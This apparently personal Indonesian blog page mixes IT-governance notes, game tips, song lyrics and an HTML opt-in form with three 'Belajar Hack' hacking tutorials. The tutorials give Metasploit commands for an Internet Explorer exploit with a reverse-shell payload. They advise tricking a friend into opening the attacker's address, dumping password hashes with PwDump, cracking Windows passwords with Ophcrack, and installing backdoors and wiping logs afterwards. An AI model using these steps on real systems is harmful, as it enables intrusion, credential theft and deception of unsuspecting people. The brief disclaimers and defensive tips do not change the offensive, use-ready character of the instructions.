tiada hari tampa sesuatu yang megasikan…………

Terbaru

Penggunaan teknologi informasi manajemen terbaru

Tata Kelola Sistem dan Teknologi Informasi

Tata kelola teknologi informasi ( IT governance) adalah suatu bagian dari tata kelola perusahaan yang menitikberatkan pada sistem dan teknologi informasi (TI) serta manajemen kinerja dan risikonya. Meningkatnya minat pada tata kelola TI sebagian besar muncul karena adanya prakarsa kepatuhan (seperti Sarbanes-Oxley di Amerika Serikat dan Basel II di Eropa) serta semakin diakuinya kemudahan proyek TI cenderung dapat lepas kendali yang berdampak besar terhadap kinerja organisasi.

Karena penerapan TI ini memerlukan biaya yang besar dan disertai resiko kegagalan yang tidak kecil, maka TI harus dikelola selayaknya aset lainnya. Penerapan TI di corporate akan dapat dilakukan dengan baik apabila ditunjang dengan suatu tata kelola TI dari mulai perencanaan sampai implementasi, terintegrasi, tata kelola terhadap keputusan-keputusan TI yang diambil, yang memastikan adanya alokasi penggunaan TI dalam strategi-strategi korporasinya

Tema utama kajian tata kelola TI adalah bahwa teknologi informasi tidak dapat lagi menjadi suatu kotak hitam. Secara tradisional, penanganan pengambilan keputusan kunci di bidang teknologi informasi diberikan kepada para profesional TI karena keterbatasan pengalaman teknis eksekutif lain di tingkatan direksi perusahaan serta karena kompleksitas sistem TI itu sendiri. Tata kelola TI membangun suatu sistem yang semua pemangku kepentingannya, termasuk direksi dan komisaris serta pengguna internal dan bagian terkait seperti keuangan, dapat memberikan masukan yang diperlukan untuk proses pengambilan keputusan. Hal ini mencegah satu pihak tertentu, biasanya TI, disalahkan untuk suatu keputusan yang salah. Hal ini juga mencegah munculnya keluhan dari pengguna di belakang hari mengenai sistem yang tak memberikan hasil atau kinerja sesuai yang diharapkan.

Perubahan akibat perkembangan teknologi baru yang tersedia dan peningkatan permintaan masyarakat/pasar akan pelayanan teknologi informasi, mengharuskan perusahaan memiliki arah dan strategi penerapan teknologi informasi di lingkungan bisnisnya. Arah strategis diperlukan untuk menjaga agar implementasi teknologi yang berkembang baik atas prakarsa top manajemen maupun prakarsa manajemen menengah dan bawah dapat bersinergi untuk memberi layanan teknologi informasi yang optimal.

Organisasi SIM

Sistem dan Teknologi Informasi (STI) sudah menjadi bagian yang tak terpisahkan dari organisasi, baik organisasi bisnis, nirlaba maupun pemerintahan. Kemampuan memberdayakannya di organisasi menjadi faktor kunci dalam mencapai keunggulan organisasi. Ketidakberhasilan penerapan STI pada umumnya disebabkan karena persepsi terhadap STI belum sesuai dengan peran dan potensi yang semestinya. Keduanya masih dianggap sebagai pendukung, belum sebagai enabler, yang memungkinkan tujuan dan sasaran bisnis dapat terwujud. Sehingga model penerapan, inovasi dan investasi STI belum dapat dicapai secara optimal. Agar STI dapat diberdayakan untuk meningkatkan daya saing atau kualitas pelayanan publik, diperlukan cara pandang STI sebagai enabler dalam proses transformasi bisnis. Proses transformasi ini memerlukan seorang innovator yang bisa mengintegrasikan antara visi organisasi dengan kemampuan sumberdaya informasi dan sumber daya lainnya. Disinilah dibutuhkan peran seorang CIO (Chief Information Officer) untuk memimpin suatu transformasi tersebut diatas berbasiskan pengelolaan informasi secara efektif.

CIO adalah suatu jabatan dalam organisasi (bisnis, pemerintahan ataupun nirlaba) yangjunyai peran sebagai pemimpin dalam penyediaan informasi bagi kelangsungan hidup organisasi dalam rangkaapai tujuannya. CIO menjadi semakin vital di era informasi dimana eksistensi organisasi sangat ditentukan olehmpuan dalam memberdayak. Secara fungsional CIO membawahi tiga divisi: Sistem Informasi, Teknologi Informasi, dan Manajemen Informasi. Divisi Sistem Informasi berfungsi untuk menganalisa kebutuhan informasi dari sebuah perusahaan baik saat ini maupun di kemudian hari nanti (aspek dem and dari informasi). Secara prinsip ada dua jenis aktivitas yang harus dilakukan oleh divisi ini:

• Business Supports – merupakan fungsi untuk selalu memonitor kebutuhan manajemen perusahaan akan informasi sebagai penunjang dalam menjalankan aktivitas bisnis sehari-hari, mengevaluasi tingkat efektivitas penggunaan aplikasi bisnis yang ada, dan mengusulkan aplikasi-aplikasi tambahan maupun perbaikan terhadap yang telah dimiliki, dan mendefinisikan kebutuhan-kebutuhan baru.

• Information System Studies – meru-pakan suatu forum penelitian dan pengembangan yang bertanggung jawab untuk selalu memantau perkembangan teknologi di industri dimana perusahaan tersebut beroperasi, terutama bagaimana para kompetitor memanfaatkannya atau merencanakan strategi untuk memanfaatkannya. Secara berkala, forum ini akan mempresentasikan kepada manajemen puncak kesempatan-kesempatan bisnis yang mungkin dilakukan di kemudian hari melalui implementasi perangkat teknologi informasi yang baru. Tim ini pula yang akan menjadi penasehat utama CIO dalam usaha mengembangkan sistem informasi perusahaan.an STI.

CIO

Rekayasa Ulang Proses Bisnis

Proses Bisnis dan Teknologi Informasi

IT enablement

Beberapa perusahaan modern memanfaatkan solusi bisnis yang dibangkitkan dengan teknologi informasi (TI), untuk mengoptimalkan proses bisnis yang dimilikinya. Akan tetapi kadang solusi yang dikembangkan tidak menyeluruh. Mereka membangun solusi TI tersebut dalam beberapa sistem yang terpisah, bukan dalam satu kesatuan. Sistem yang dibangun biasanya terbagi berdasarkan unit kerja, atau berdasarkan proses bisnis yang ada. Manajemen Proses Bisnis atau Business Process Management (BPM) dibutuhkan bisnis untuk membantu dalam menghadapi tantangan dan kompetisi seperti sekarang ini. BPM adalah solusi TI dengan pendekatan baru yang ampuh digunakan untuk membantu meningkatkan efisiensi dan menumbuhkan nilai kompetitif suatu bisnis. BPM dirancang untuk mengintegrasikan antara tenaga ahli perusahaan dan sistem informasi melalui proses-proses yang telah terotomatisasi dan bersifat fleksibel. BPM juga memberikan solusi yang tepat untuk meningkatkan daya respon perusahaan secara signifikan, dalam menyesuaikan keinginan pelanggannya pada setiap produk atau layanan yang dihasilkan.  Akses informasi  dapat diberikan secara langsung (real-time),  sehingga dapat digunakan untuk mengidentifikasi masalah, serta pengambilan tindakan secara lebih cepat dan tepat.

Manajemen Proses Bisnis yang efektif dan efisien dapat menghasilkan nilai-nilai kompetitif bagi perusahaan. Proses bisnis yang dikelola dengan baik akan mampu menumbuhkan peluang. Namun perusahaan terkadang kurang memahami dan tidak mampu mengontrol proses bisnis yang dimilikinya. Pihak manajemen mungkin telah berhasil membuat prosedur yang ideal untuk menjalankan proses bisnisnya, tapi pada kenyataannya, implementasi di lapangan dapat sangat berbeda dari apa yang telah dirancang sebelumnya. Pada pelaksanaan suatu proses bisnis kadang terjadi redundansi, ketidakefisienan, stagnasi, dan berbagi kesalahan-kesalahan lainnya yang tidak dapat diantisipasi sebelumnya. Bisnis yang tidak tangkas dalam mengontrol proses bisnis yang dimilikinya cenderung akan menghalangi usaha perusahaan dalam mencapai sasaran yang diinginkan.

Tips & Trik Ninja Saga Di Facebook

| Edit Post Siapa yang tidak kenal sama game yang satu ini, Ninja Saga on fesbuk. Game ini mirip dengan anime dari jepang yaitu Naruto, dari hasil-hasil yang saya peroleh, bahwa karakter-karekter di game ini mirip dengan karakter anime Naruto yaitu pada gambar laki-lakinya mirip Sasuke dan yang perempuan mirip Sakura. Nah di tutorial kali ini saya akan berikan Tips dan Trik mengenai Ninja saga bagi para gamer’s di facebook. Oke dari pada kelamaan langsung saja kita ikuti tips & triknya. ELEMEN Photobucket Di dalam permainan ninja saga ini anda hanya dapat mendapatkan 2 elemen saja (bagi yang free user) dan 3 elemen (bagi yang premium user) alias mbayar. Nah sedikit saya akan menjelaskan mengenai elemen-elemen tersebut. Fire (Api) Photobucket Adalah elemen terkuat dari elemen-elemen lainya dan memiliki serangan jutsu tertinggi. Setiap 1 point yang diperoleh elemen api akan menambahkan 0,4% damage untuk semua elemen dan 0,4% kesempatan serangan bertambah 30% pada turn yang selanjutnya. Water (Air) Photobucket Adalah elemen yang paling hebat dalam hal penyembuhan, dan setiap satu point yang diperoleh akan meningkatkan 40 CP. Earth (Tanah) Photobucket Adalah elemen yang memiliki serangan stun paling hebat, setiap 1 point yang didapatkan elemen tanah akan meningkatkan hit point sebanyak 40 HP dan kesempatan mengembalikan serangan musuh. Wind (Angin) Photobucket Adalah elemen yang memeiliki keunggulan dalam menghindar (dodge) dari serangan musuh, setiap 1 point yang didapatkan akan menambahkan dodge rate. Lightning (Petir) Photobucket Adalah elemen yang bagus dan memiliki keunggulan dalam serangan kritikal, setiap 1 point yang didapatkan elemen petir akan menambah kesempatan melakukan serangan kritikal dan tambahan damage saat melakukan serangan kritikal. KOMBINASI SEBUAH ELEMEN Api – Petir Photobucket Kalau anda memilih ke 2 elemen ini maka anda akan memiliki serangan yang sangat mematikan , karena serangan dari api yang kuat dan besar didukung dengan serangan kritikal dari petir, sehingga serangan ini dapat mematikan dan dahsyat. Angin – Tanah Photobucket Jika menggunakan ke2 jutsu ini maka anda akan sulit untuk dikalahkan oleh musuh lain, karena angin memiliki keunggulan dalam menghindar sedangkan tanah memiliki keunggulan dalam meningkatkan point, sehingga karakter anda ini sangat sulit untuk di lukai musuh lain dan memiliki hit point yang begitu besar Tanah – Air Photobucket Elemen ini sangat berguna bagi para ninja saga yang suka menjalankan misi berat, karena jika ke2 elemen ini di gabungkan maka akan menjadi pertahanan yang sangat kuat, karena elemen tanah dapat meningkatkan hit point, begitu juga dengan elemen air yang dapat menyembuhkan dengan cepat (heal), keunggulan ini adalah membuat karakter kamu sulit dikalahkan oleh player lain. Listrik – Tanah Photobucket Ke2 jutsu ini bila digabungkan maka akan menciptakan kemampuan membuat musuh menjadi terdiam (stun) dan tidak dapat bergerak dalam beberapa waktu, oleh sebab itu, ke2 elemen ini cocok bagi anda yang memiliki jutsu berkemampuan stun (earth strangle & lightning shock) MENDAPATKAN GOLD DENGAN MUDAH Jika anda ingin cepat kaya silahkan dalam misi pertarungan pilih misi yang di bawah level dan memiliki point gold yang tinggi, biasanya jika memiliki gold besar maka exp yang kecil. Nah lakukanlah berkali-kali hingga berkai-kali…!! Dan satu lagi saran saya jika sedang melakukan misi pilihlah yang memiliki boss agar anda bisa mendapatkan free item (reward) jika item itu begitu mahal tetapi damage hanya sedikit lebih baik di jual saja itung2 dapat menabung. MENDAPATKAN PREMIUM ITEM SECARA GRATIS Bagi anda yang ingin membeli item premium namun tidak memiliki token anda bisa melakukan dengan menyelesaikan dailu task yang muncul sehari sekali ketika membuka ninja saga, walaupun tidak 100% namun ini perlu bagi anda untuk melakukannya. Di daily task ini anda bisa mendapat reward berupa gold, exp, item, dll. MENYELESAIKAN DAILY TASK DENGAN CEPAT DAN MUDAH Nah bagi yang ingin cepat untuk menyelesaikan dayli task di ninja saga caranya cukup mudah saka akan berikan sedikit tips yaitu jika daily task berupa menyelesaikan misi anda tinggal pilih saja misi pertama, jika daily task berupa invite friend anda tinggal mengajak teman dengan 2 orang…jangan satu2, dan jika daily task berupa exp silahkan memilih misi yang banyak mengandung exp. Itu dulu tutorial facebook yang dapat saya berikan, lain waktu kita bahas yang lebih banyak..!! selamat bermain semoga sukses selalu….!! Jika ada masukan silahkan Komen2….

Belajar Hack Yuck! (3) – Hack Windows XP SP2

*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.

Disclaimer: This document was written in the interest of education. The author cannot be held responsible for how the topics discussed in this document are applied.

Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahas dibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua, sekarang langsung aja kita praktek. Disini saya sengaja menggunakan VMWare untuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhana yang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! Sistem Operasi yang saya gunakan adalah Windows XP SP2.

Tools yang saya gunakan adalah Metasploit Framework untuk melakukan exploit serta PwDump6 untuk mengambil hash file dari komputer target. Apa itu Metasploit Framework ?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, and vulnerability research.

Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membaca dokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7, dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limited user’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanya mengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaitu versi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu aja ko repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapi sayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.

Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. paling asumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, saya menjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploit menggunakan cygwin untuk menjalankannya, karena metasploit dibuat menggunakan Perl. Sekarang mari kita praktekkan!!

Pertama2 jalankan ‘mfsconsole’!

main1.JPG

Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.

Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakan exploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

Untuk melihat info dari exploit ini gunakan perintah :

msf > info ie_vml_rectfill

Exploit ie_vml_rectfill memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu, exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit ‘social engineering’, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedang mencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE ke alamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelah exploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja “wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja😀 ).

Untuk menggunakan exploit gunakan perintah2 berikut dalam console :

msf > use_ie_vml_rectfill

msf > set PAYLOAD win32_reverse

msf > set RHOST ip_target

msf > set LHOST ip_penyerang

msf > exploit

Hasilnya akan tampak seperti gambar berikut :

exploit1.JPG

Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkan komputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan adalah ‘win32_reverse’ dan HTTP PORT nya adalah 80 (default http port). Setalah menjalankan perintah ‘exploit’, baru kita minta komputer target untuk menjalankan IE dan mengarahkan url-nya ke komputer kita. Proses ini akan memakan waktu agak lama, bahkan terkadang tidak berhasil. Jadi coba-coba aja terus😀

Jika anda berhasil, maka anda akan mendapatkan ‘cmd.exe’ dari komputer target.

Crack da Password!

Nah, setelah kita ‘menguasai’ komputer target, skalian aja kita lihat password-nya. Caranya mirip dengan artikel saya sebelumnya tentang Hack Win XP SP2 Password, tapi karena ini remote maka kita harus ‘menyediakan’ program yg dibutuhkan yaitu PwDump. Agar cara ini berhasil, saya asumsikan pada komputer target user yang sedang login mempunyai akses admin. Klo user yang digunakan komputer target yang dimanfaatkan IE-nya hanya user ‘biasa’, pwdump tidak akan berhasil!

Pertama kita share dulu PwDump dari komputer kita dengan full access agar kita bisa mengupload hasil dump password komputer target, tapi dengan akhiran ‘$’ biar tidak terlihat dikomputer umum. Misalkan nama folder yang di share PwDump$. Lalu dari console yang berhasil dihack, ambil PwDump dengan Map Network Drive dari komputer kita dengan ‘net use’. Contoh perintah yang digunakan :

pwdump.JPG

Setelah itu copy Pwdump ke komputer target dalam folder sementara, ‘temp’. Setelah Pwdump berhasil di-copy ke komputer target, jalankan Pwdump dengan perintah

C:\temp\Pwdump –o pass.txt 127.0.0.1

Klo berhasil akan tampak pada gambar berikut.

dump1.JPG

Lalu copy file pass.txt ke komputer kita

C:\temp\copy pass.txt z:

Dan terakhir, jangan tinggalkan jejak bahwa kita sudah mampir kesitu.

clean.JPG

Nah, udah dapet hash file nya kan. Tinggal di crack aja deh…. (baca artikel sebelumnya buat nge-crack password).

Sebenarnya masih banyak yang dapat dioprek dari metasploit. Dalam metasploit terdapat banyak exploit, payload, meterpreter, dsb yang sangat ‘menyenangkan’ untuk dioprek. Untuk mempelajari metasploit, disitusnya terdapat dokumentasi yang lumayan baik.

Happy Hacking…..

Beberapa saran agar windows kita tetap aman terhadap exploit diatas.

1. Jangan gunakan Internet Explorer. Gunakan Mozilla Firefox atau Opera!.

2. Patch Windows anda.

3. Gunakan antivirus dengan update terbaru

4. Hati2 terhadap teman anda sendiri.. waspadalah!! ;p

Reference :

http://www.metasploit.com

Hack Windows XP Password dengan Ophcrack

Sebelumnya saya pernah membuat tutorial mengenai Hack Windows XP (SP2) Passwords menggunakan pwdump6. Namun, cara tersebut mengharuskan user dengan status admin agar dapat ‘dump’ file HASH dari Windows. Sekarang saya akan menyampaikan cara lain untuk ‘cracking’ password Windows XP (semua versi) dengan menggunakan Ophcrack.

Ophcrack is a Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a GTK+ Graphical User Interface and runs on Windows, Mac OS X (Intel CPU) as well as on Linux.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry)😀 . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Ok.. langsung aja kita praktek, tapi sebelumnya pasang disclaimer dulu ah… biar bisa ‘lepas’ tanggung jawab kalau tutorial ini disalahgunakan oleh pihak lain😛

Disclaimer:

This document was written in the interest of education and care of awareness for unaware people. The author cannot be held responsible for how the topics discussed in this document are applied.

Lets Begin

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp

dump.JPG

Kemudian tunggu beberapa saat untuk melakukan cracking.

Saya melakukan pengujian menggunakan spesifikasi sebagai berikut : Prosessor AMD +2000 1.6 Ghz, Memori 256 Mb dan dijalankan menggunakan VM-Ware.

Lalu saya menggunakan password yang sangat sederhana, yaitu ‘password123′ dan ‘password’. Hasilnya, Ophcrack mampu menebak kedua password dengan tepat dan hanya membutuhkan waktu 1 Menit!!

Lalu saya coba untuk mengkombinasikan huruf, angka dan simbol dengan memberikan password : ‘p4ssw0rd’ dan ‘p4ssw0rd~!@#’. Hasilnya, Ophcrack mampu menebak ‘p4ssw0rd’ dengan waktu 8 menit dan tidak dapat menemukan ‘p4ssw0rd~!@#’.

hasil.JPG

Selain menggunakan CD, dengan sedikit modifikasi, Ophcrack juga dapat dijalankan melalui USB Flashdisk. Caranya dengan menginstall SLAX ke dalam USB Flashdisk dan menambahkan modul ophcrack di SLAX serta menyalin Rainbow Tables ke dalam USB, maka Ophcrack LiveUSB sudah dapat dijalankan😀

Selain itu, untuk mempersingkat waktu, kita dapat mengambil file HASH terlebih dahulu yang terletak di /tmp/ophcrack.tmp kemudian baru di crack di tempat lain tanpa perlu menunggu lagi di komputer target.😀

Saran

Ibarat pisau bermata dua, Ophcrack dapat menjadi sangat berguna ketika ada seseorang yang lupa password Windows dan ingin me-recovery password dengan cepat dan mudah. Namun disisi lain, Ophcrack dapat juga menjadi ‘senjata’ ampuh bagi cracker untuk menjebol Windows dengan cara yang sangat mudah dan cepat. Bahkan kabarnya Ophcrack ini merupakan tools yang paling cepat untuk crack password Windows. Untuk itu ada beberapa hal yang dapat mengurangi resiko agar password komputer kita tidak ‘dibobol’ dengan mudah.

1. Setting password BIOS komputer dan atur urutan boot agar tidak melakukan booting pertama kali dari CD atau USB.

2. Gunakan password yang terdiri dari huruf+angka+simbol agar tidak mudah di crack.

Oph… Crack!!😀

NB : Cara lain menggunakan ophcrack di Windows dapat dilihat disini

Belajar Hack Yuck! (1) – Konsep Dasar Hacking

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ‘standar’, hacking sebenarnya tidak harus selalu sesuai dengan ‘standar’ ini.

Hacking buat pemula

– by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan… Apalagi klo di kost ada jaringan.

Pro dan Kontra Hacking

Pro

Kontra

Etika Hacking

Semua informasi adalah free

Jika semua informasi adalah free, maka tidak ada ladi privacy

Aspek Security

Intrusion adalah ilustrasi kelemahan sistem

Tidak perlu menjadi pencuri untuk menunjukkan pintu yang tidak terkunci

Idle Machines

Hacking hanya pada idle machines

idle machines milik siapa ?

science education

hanya membobol tapi tidak merusak

“hacker wannabe” berpotensi sangat besar untuk merusak

Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

– Secara Aktif : – portscanning

– network mapping

– OS Detection

– application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

– Secara Pasif : – mailing-list (jasakom, newbie_hacker, hackelink, dsb)

– via internet registries (informasi domain, IP Addres)

– Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
– compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t http://www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

– Secara berulang melakukan percobaan otentifikasi.

– Menebak username dan password.

– Cracking password file

~ Social Engineering

– Memperdayai user untuk memeberi tahu Username dan password

– Intinya ngibulin user….

3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

Referensi :

-Hacking and Defense, Jim Geovedi, negative@magnesium.net

-Network Defense, Jim Geovedi, negative@magnesium.net

aaa

Anda bisa memasukkan Nama dan Alamat Email Anda pada form dibawah ini. Dan saya akan kirimkan link download ke email Anda langsung dan juga mengabari Anda untuk update dan informasi lainnya. Ebook tersebut gratis sebagai salam perkenalan dari saya.
 
</tr>
<tr>
&nbsp;
<td width=”534″ valign=”top”><p align=”center”>

</p><p align=”center”>
Arial, Helvetica, sans-serif”>
<script language=”JavaScript”>
function checkSub(){
if (document.signup.email.value.indexOf(‘@’, 0) == -1) {
alert(“Please fill in your valid Email address.\nYour email should be in the following format: email@address.com”)
document.signup.email.focus()
return false}
if (document.signup.fname.value == “”) {
alert(“Please fill in your First name.”)
document.signup.fname.focus()
return false}
}</script>
</font></span>
</p><form action=”http://monsterresponse.com/ar/ar/optin.php&#8221; method=”post” name=”signup” onsubmit=”return checkSub()”>
Arial, Helvetica, sans-serif”>
<input name=”action” value=”addlead” type=”hidden”>
<input name=”member” value=”174″ type=”hidden”>

<input name=”auto” value=”4662″ type=”hidden”>
<input name=”thankyou” value=”http://www.belajarmembuatwebsite.com/cekemail.html&#8221; type=”hidden”>
</font> </span>
<table align=”center” border=”0″ cellpadding=”2″ cellspacing=”0″>
<tbody><tr>
Arial, Helvetica, sans-serif”>Nama Anda :
Arial, Helvetica, sans-serif”>
<input size=”40″ name=”fname” type=”text”>
</font></td></tr><tr>

Arial, Helvetica, sans-serif”>Alamat Email :
Arial, Helvetica, sans-serif”>
<input size=”40″ name=”email” type=”text”>
Arial, Helvetica, sans-serif”>
<input value=”Download Ebook Gratis!” type=”submit”>
</font></td></tr></tbody></table>
</form>
<font><br>

<br>
</font> </td>
&nbsp;
</tr>
</tbody>
</table>
&nbsp;

Slank – Pliss

Pliss jangan membohongi
Karena perihnya berasa
Pliss jangan khianati
Karena ku tak pernah mendua

Semua yang kau minta slalu ku ikuti
Semua yang kau suka slalu ku turuti
So pliss janga buat ku bersedih
Karena ku slalu setia ya ya ya ya

Baca kelanjutan halaman ini »